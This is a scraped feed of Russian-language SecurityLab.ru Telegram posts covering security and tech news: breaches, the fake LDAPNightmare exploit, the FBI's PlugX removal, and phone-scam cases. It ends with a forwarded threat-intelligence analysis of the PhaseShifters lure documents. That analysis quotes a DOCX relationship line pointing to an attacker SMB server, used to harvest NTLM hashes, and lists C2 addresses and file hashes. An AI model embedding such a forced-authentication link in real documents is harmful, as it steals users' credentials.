#Иран #СвободаИнтернета #Реформы @SecLabnews
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
Исторический шаг Ирана: отменен запрет на WhatsApp и Google Play
Снятие блокировок — сигнал перемен для миллионов граждан.
#Nvidia #ProjectDigits #AI @SecLabnews
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
$3,000 за суперкомпьютер: Nvidia объявляет цену Project Digits
Локальная разработка моделей теперь доступна каждому.
Утечка геоданных: хакеры взломали поставщика данных для спецслужб США
📍 Хакеры заявили о взломе Gravy Analytics, торгующей данными о местоположении. Они утверждают, что получили доступ к клиентской базе, отраслевой информации и точным координатам пользователей. В случае отсутствия ответа от компании в течение 24 часов злоумышленники угрожают публикацией данных.
⚠️ Опубликованы образцы данных с координатами пользователей из разных стран. В них указаны время передвижения, вероятный статус («за рулём») и другая чувствительная информация. Среди стран, чьи граждане затронуты утечкой, названы Россия, Мексика и Нидерланды.
💻 Хакеры утверждают, что проникли в инфраструктуру компании ещё в 2018 году. Опубликованные скриншоты демонстрируют доступ к серверам, доменам и хранилищам Amazon S3. Также отмечается, что серверы Gravy Analytics работают на Ubuntu, что подчёркивает масштаб компрометации.
#утечка #кибербезопасность #геоданные #взлом
@SecLabNews
#утечка #кибербезопасность #геоданные #взлом
@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
Слежка через смартфоны: новый скандал с участием спецслужб
Массовая утечка данных затрагивает всех пользователей – от смартфонов до спецслужб.
OpenAI под давлением: ChatGPT оказался замешан во взрыве Cybertruck
🚨 1 января у отеля Trump International произошел взрыв электрического пикапа Tesla Cybertruck. В результате инцидента погиб водитель Мэтью Ливелсбергер, семь прохожих получили лёгкие травмы.
🤖 Следствие установило связь между планированием атаки и использованием ChatGPT. Подозреваемый искал информацию о взрывчатых веществах и способах их применения через чат-бот. OpenAI заявила, что её ИИ не поддерживает вредоносные действия.
💔 Погибший оставил записки, где назвал свои действия «сигналом тревоги» для общества. Следователи считают, что причиной его поступка стало посттравматическое стрессовое расстройство после службы в Афганистане.
#ChatGPT #Cybertruck #безопасностьИИ #ЛасВегас
@SecLabNews
#ChatGPT #Cybertruck #безопасностьИИ #ЛасВегас
@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
ChatGPT написал сценарий теракта для ветерана в Вегасе
ChatGPT и опасности его неправильного применения.
71% россиян поддержали идею регулирования видеоигр
🎮 Спикер Госдумы Вячеслав Володин 9 января заявил, что парламент планирует защитить граждан, особенно детей, от деструктивного контента. Володин запустил голосование среди подписчиков в соцсетях, предложив поддержать инициативу, и к середине дня понедельника участие приняли более 113 тысяч человек, из которых 71% высказались «за», 26% — «против», а 3% выразили безразличие.
📋 В декабре 2024 года группа сенаторов и депутатов внесла законопроект об обязательной маркировке возрастных ограничений, сцен жестокости, насилия, нецензурной лексики и демонстрации алкоголя и наркотиков. В поддержку инициативы заместитель председателя думского комитета по IT Антон Горелкин отметил, что это поможет родителям и игрокам заранее понимать содержание игры.
🔐 В рамках законопроекта предусмотрена возможность обращения к аккредитованным экспертам для проверки или пересмотра маркировки игр. Также документ предлагает три варианта верификации пользователей при покупке: по номеру телефона, через портал госуслуг или с использованием биометрии.
#видеоигры #закон #контроль #госдума
@SecLabNews
📋 В декабре 2024 года группа сенаторов и депутатов внесла законопроект об обязательной маркировке возрастных ограничений, сцен жестокости, насилия, нецензурной лексики и демонстрации алкоголя и наркотиков. В поддержку инициативы заместитель председателя думского комитета по IT Антон Горелкин отметил, что это поможет родителям и игрокам заранее понимать содержание игры.
🔐 В рамках законопроекта предусмотрена возможность обращения к аккредитованным экспертам для проверки или пересмотра маркировки игр. Также документ предлагает три варианта верификации пользователей при покупке: по номеру телефона, через портал госуслуг или с использованием биометрии.
#видеоигры #закон #контроль #госдума
@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
71% россиян поддержали: госдума защитит детей от жестоких игр
Что ждет игроков в 2025 году?
Дуров: «Мы защищаем свободу слова независимо от политической ситуации»
🎯 Павел Дуров заявил о неизменной позиции Telegram в отношении свободы слова независимо от политической ситуации. Основатель мессенджера подчеркнул, что платформа поддерживала эти принципы задолго до того, как это стало политически безопасно.
🔄 Meta* объявила об отказе от программы проверки фактов в пользу системы, аналогичной Community Notes. Компания также планирует смягчить модерацию контента и назначила на ключевые посты сторонников Трампа.
⚡️ Дуров отметил, что истинная проверка новых ценностей других платформ наступит при смене политического вектора. По его мнению, легко говорить о поддержке свободы слова, «когда вы ничем не рискуете».
* Компания Meta и её продукты признаны экстремистскими, их деятельность запрещена на территории РФ.
#Telegram #СвободаСлова #Модерация #Цензура
@SecLabNews
* Компания Meta и её продукты признаны экстремистскими, их деятельность запрещена на территории РФ.
#Telegram #СвободаСлова #Модерация #Цензура
@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
Свобода слова не продаётся: Дуров уличил Meta в двойной игре
Основатель мессенджера ответил Цукербергу.
Двойная опасность: критические баги LDAP и фальшивый эксплойт
🔥 Microsoft исправила две критические уязвимости в протоколе LDAP для Windows в декабре 2024 года. Наиболее опасная из них (CVE-2024-49112) имеет оценку CVSS 9.8 и позволяет удалённое выполнение кода.
🎣 В сети появился поддельный эксплойт LDAPNightmare, якобы использующий уязвимость CVE-2024-49113. На самом деле программа оказалась замаскированным инфостилером, нацеленным на исследователей безопасности.
🔍 Вредоносный код распространяется через поддельный репозиторий, являющийся форком легитимного проекта. При запуске вредонос собирает системную информацию и данные пользователя, отправляя их на удалённый FTP-сервер.
#cybersecurity #WindowsSecurity #LDAP #infosec
@SecLabNews
🔥 Microsoft исправила две критические уязвимости в протоколе LDAP для Windows в декабре 2024 года. Наиболее опасная из них (CVE-2024-49112) имеет оценку CVSS 9.8 и позволяет удалённое выполнение кода.
🎣 В сети появился поддельный эксплойт LDAPNightmare, якобы использующий уязвимость CVE-2024-49113. На самом деле программа оказалась замаскированным инфостилером, нацеленным на исследователей безопасности.
🔍 Вредоносный код распространяется через поддельный репозиторий, являющийся форком легитимного проекта. При запуске вредонос собирает системную информацию и данные пользователя, отправляя их на удалённый FTP-сервер.
#cybersecurity #WindowsSecurity #LDAP #infosec
@SecLabNews
SecurityLab.ru
LDAPNightmare: эксплойт Windows оказался ловушкой для ИБ-специалистов
Обновления породили нового троянского коня для Microsoft.
Семейный подряд: как пара из Подмосковья обманула маркетплейс на миллионы
📱 На протяжении пяти месяцев супружеская пара использовала специальное ПО для размещения фиктивных отзывов на маркетплейсе. Мошенники создали около миллиона поддельных комментариев, получая за них бонусные баллы.
💰 Злоумышленники открыли на платформе фиктивный магазин для обналичивания накопленных бонусов. Через него они проводили сделки сами с собой по завышенным ценам, что позволило им получить более 18 миллионов рублей.
🚔 При задержании у пары изъяли технику, премиальный автомобиль и 8 миллионов рублей наличными. Сейчас полиция ищет возможных соучастников преступления.
#мошенничество #кибербезопасность #маркетплейсы #МВД
@SecLabNews
🚔 При задержании у пары изъяли технику, премиальный автомобиль и 8 миллионов рублей наличными. Сейчас полиция ищет возможных соучастников преступления.
#мошенничество #кибербезопасность #маркетплейсы #МВД
@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
Бонусы в миллионы: пара из Подмосковья создала идеальную схему обмана маркетплейса
Супруги заработали 18 млн за пять месяцев.
#суд #роскомнадзор #youtube @SecLabnews
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
Суд отклонил обвинения в бездействии Роскомнадзора по делу YouTube
Петербуржец не смог доказать нарушение ведомством своих обязанностей.
#КНДР #интернет #VPN #исследование
@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
Hangro VPN: как работает интернет в самой закрытой стране мира
Пользователь Reddit случайно раскрыл тайную сеть Северной Кореи.
#мошенничество #кибербезопасность #даркнет #финансы
@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
Университет для хакеров: диплом в даркнете, цель – ваш бизнес
«Сбер» рассказал о новом типе угроз.
*Meta признана экстремистской организацией и запрещена в РФ
#кибербезопасность #WhatsApp #Signal #приватность
@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
Цукерберг: спецслужбы США могут читать любой WhatsApp-чат
Глава Meta объяснил, почему шифрование не гарантирует полную конфиденциальность сообщений.
Forwarded from Цифровой блокпост
Шантаж телефонных мошенников унес жизнь юного физика
😰 Первокурсник физтеха Петр Ветчинкин провел последние часы жизни под непрерывным давлением телефонных мошенников. Преступники несколько часов манипулировали молодым человеком, угрожая его семье и обвиняя в экстремизме.
💸 Мошенники вынудили студента оформить несколько кредитов и перевести деньги на «безопасный счет». После длительного психологического прессинга юноша вышел из дома и больше не отвечал на звонки.
⚡️ Трагедия стала частью волны преступлений телефонных террористов в конце 2024 года. За короткий период было зафиксировано 55 попыток поджогов и подрывов по всей России.
#мошенники #трагедия #МФТИ #телефонныйтеррор
@CyberStrikeNews
😰 Первокурсник физтеха Петр Ветчинкин провел последние часы жизни под непрерывным давлением телефонных мошенников. Преступники несколько часов манипулировали молодым человеком, угрожая его семье и обвиняя в экстремизме.
💸 Мошенники вынудили студента оформить несколько кредитов и перевести деньги на «безопасный счет». После длительного психологического прессинга юноша вышел из дома и больше не отвечал на звонки.
⚡️ Трагедия стала частью волны преступлений телефонных террористов в конце 2024 года. За короткий период было зафиксировано 55 попыток поджогов и подрывов по всей России.
#мошенники #трагедия #МФТИ #телефонныйтеррор
@CyberStrikeNews
SecurityLab.ru
Мошенники вынудили первокурсника взять кредиты и довели до суицида
Семья погибшего студента МФТИ рассказала о последних часах сына.
#кибербезопасность #законопроект #защитаданных #Минфин
@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
Минфин предложил тюремные сроки за утечку банковской и налоговой тайны
В России ужесточают наказание за незаконное распространение финансовых данных.
📡 В Роскомнадзоре причиной сбоя назвали кратковременное нарушение связности. По данным ведомства, работа сети была оперативно восстановлена дежурными службами Центра мониторинга и управления сетью связи общего пользования.
#сбой #интернет #новости @SecLabnews
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
День, когда интернет исчез: перебои в России парализовали ключевые сервисы
В Роскомнадзоре заявили, что не знают причин падения интернета.
4200 компьютеров под управлением PlugX: ФБР вмешалось
👮♀️ ФБР провело специальную операцию по удалению вредоносного ПО PlugX с 4200 компьютеров в США. Вредонос использовался хакерской группой «Mustang Panda» для кражи данных и удалённого доступа к системам жертв.
🕷 Вредоносная программа распространялась через USB-накопители и действовала с 2012 года, атакуя компьютеры по всему миру. По данным ФБР, только с сентября 2023 года около 45 000 IP-адресов в США обращались к командному серверу вредоноса.
⚡️ В ходе операции ФБР использовало собственные механизмы вредоноса для его деактивации, работая совместно с французскими правоохранителями. Специальное командное сообщение заставило PlugX удалить все созданные файлы и полностью прекратить работу.
#PlugX #кибератака #ФБР #кибербезопасность
@SecLabNews
#PlugX #кибератака #ФБР #кибербезопасность
@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
ФБР взломало 4200 компьютеров, чтобы уничтожить китайский вирус
Агентство атаковало сеть PlugX.
ИИ против программистов: планы Meta на 2025 год
🤖 В подкасте The Joe Rogan Experience Марк Цукерберг сообщил о разработке ИИ для замены инженеров среднего звена. «Вероятно, в 2025 году у нас в Meta*, как и у других компаний, работающих в этом направлении, появится ИИ, который фактически сможет выполнять роль инженера среднего звена и писать код», — заявил он.
💰 Текущая средняя зарплата инженеров среднего звена в Meta составляет несколько сотен тысяч долларов в год. Хотя Цукерберг не говорит напрямую о сокращении персонала, его заявление намекает на возможные изменения для разработчиков.
👀 Глава Meta отметил, что в будущем большая часть кода будет создаваться ИИ-инженерами, а не людьми. При этом он подчеркнул, что новая технология скорее дополнит специалистов, позволив им заниматься «более смелыми задачами».
* Компания Meta и её продукты признаны экстремистскими, их деятельность запрещена на территории РФ.
#Meta #ИИ #программисты #будущее
@SecLabNews
* Компания Meta и её продукты признаны экстремистскими, их деятельность запрещена на территории РФ.
#Meta #ИИ #программисты #будущее
@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
Цукерберг: ИИ заменит программистов в Meta уже в 2025 году
Глава компании рассказал о планах автоматизировать процессы разработки.
Forwarded from ESCalator
Ваш хеш, пожалуйста… Спасибо! 🙏
В начале января мы обнаружили файл, который привлек внимание своим содержанием и структурой. Исследование метаданных документа, а также используемых техник соединения с сервером по протоколу SMB через DOCX-файлы позволило установить связь с хакерской группировкой PhaseShifters. Информацию о ней мы публиковали в статье в ноябре 2024 года (рисунок 1). В этой статье также подробно описаны взаимосвязи с группировкой UAC-0050, о которой пойдет речь далее.
🆕 С2-сервер новый, подход старый
Первый файл, про который хочется поговорить, — декой. Он содержит фотографию (рисунок 2) документа, якобы принадлежащего одной компании в сфере военно-промышленного комплекса (создание БПЛА).
Как и в предыдущих атаках, внутри документа есть ссылка-шаблон, с помощью которой происходит получение хеш-сумм NTLM пользователя. Такая техника называется Forced Authentication: посредством шаблона или взаимосвязей с внешними сущностями устройство устанавливает соединение с сервером злоумышленников по протоколу SMB, из-за чего Windows автоматически пытается провести аутентификацию на этом ресурсе.
В файле присутствует обращение к SMB-ресурсу на внешнем сервере
👤 Поискав другие файлы, связанные с этим IP-адресом, мы выявили еще несколько документов-приманок для атак на организации (рисунки 3–5). Кроме того, стоит отметить важную деталь: в метаданных указано имя пользователя, создавшего или последним изменившего документ, — kib vol.
Наличие связи с внешним SMB-сервером, а также уникальные метаданные позволили зацепиться за еще один файл, который, в свою очередь, связывался с другим IP-адресом (
Просмотрев подсеть
IoCs
С2-серверы:
SHA-256:
#TI #C2 #ioc #Phishing
@ptescalator
В начале января мы обнаружили файл, который привлек внимание своим содержанием и структурой. Исследование метаданных документа, а также используемых техник соединения с сервером по протоколу SMB через DOCX-файлы позволило установить связь с хакерской группировкой PhaseShifters. Информацию о ней мы публиковали в статье в ноябре 2024 года (рисунок 1). В этой статье также подробно описаны взаимосвязи с группировкой UAC-0050, о которой пойдет речь далее.
Первый файл, про который хочется поговорить, — декой. Он содержит фотографию (рисунок 2) документа, якобы принадлежащего одной компании в сфере военно-промышленного комплекса (создание БПЛА).
Как и в предыдущих атаках, внутри документа есть ссылка-шаблон, с помощью которой происходит получение хеш-сумм NTLM пользователя. Такая техника называется Forced Authentication: посредством шаблона или взаимосвязей с внешними сущностями устройство устанавливает соединение с сервером злоумышленников по протоколу SMB, из-за чего Windows автоматически пытается провести аутентификацию на этом ресурсе.
В файле присутствует обращение к SMB-ресурсу на внешнем сервере
45.155.249.126
. Активность сервера наблюдается с ноября 2024 года, соединение происходит через механизм связей (relations) частей WordprocessingML-документа:<ns0:Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="file://\\45.155.249.126\19i6LJ4qNx81SkAFg4mtUbf5.png" TargetMode="External" /></ns0:Relationships>
👤 Поискав другие файлы, связанные с этим IP-адресом, мы выявили еще несколько документов-приманок для атак на организации (рисунки 3–5). Кроме того, стоит отметить важную деталь: в метаданных указано имя пользователя, создавшего или последним изменившего документ, — kib vol.
Наличие связи с внешним SMB-сервером, а также уникальные метаданные позволили зацепиться за еще один файл, который, в свою очередь, связывался с другим IP-адресом (
31.214.157.167
) злоумышленников — АО-******- -12904ДО.docx. Этот документ был задействован в атаках с использованием Ozone RAT и Darktrack RAT, которые также описаны у нас в статье (рисунок 1).Просмотрев подсеть
31.214.157.0/24
, можно определить как минимум еще один IP-адрес, который замечен в подобных инцидентах, — 31.214.157.49
. Этот сервер задействовался в атаках как PhaseShifters (например, ГВПК ответ цифровому развитию.docx), так и UAC-0050 (с использованием домена tax-gov-ua.com
). Напомним, что сходства этих двух группировок все еще требуется тщательно исследовать.IoCs
С2-серверы:
45.155.249.126
31.214.157.167
31.214.157.49
SHA-256:
3172bf0dd76232fc633214f0ba92b25d27b136a2ed5d9e4e7d06b0686ef4d34c
3eca76737c6aee34b4c38845fde13bceed23a31d39e958893a44f42380ff84d5
fd50307b7f08d037c5d37f2505c8de6edc9c57e1843f4434309a135f4b43ff5c
5061e83a380a9c3ebe91bd5de80fe8f11b666a182efbebe13a1b0dfbc2842487
#TI #C2 #ioc #Phishing
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM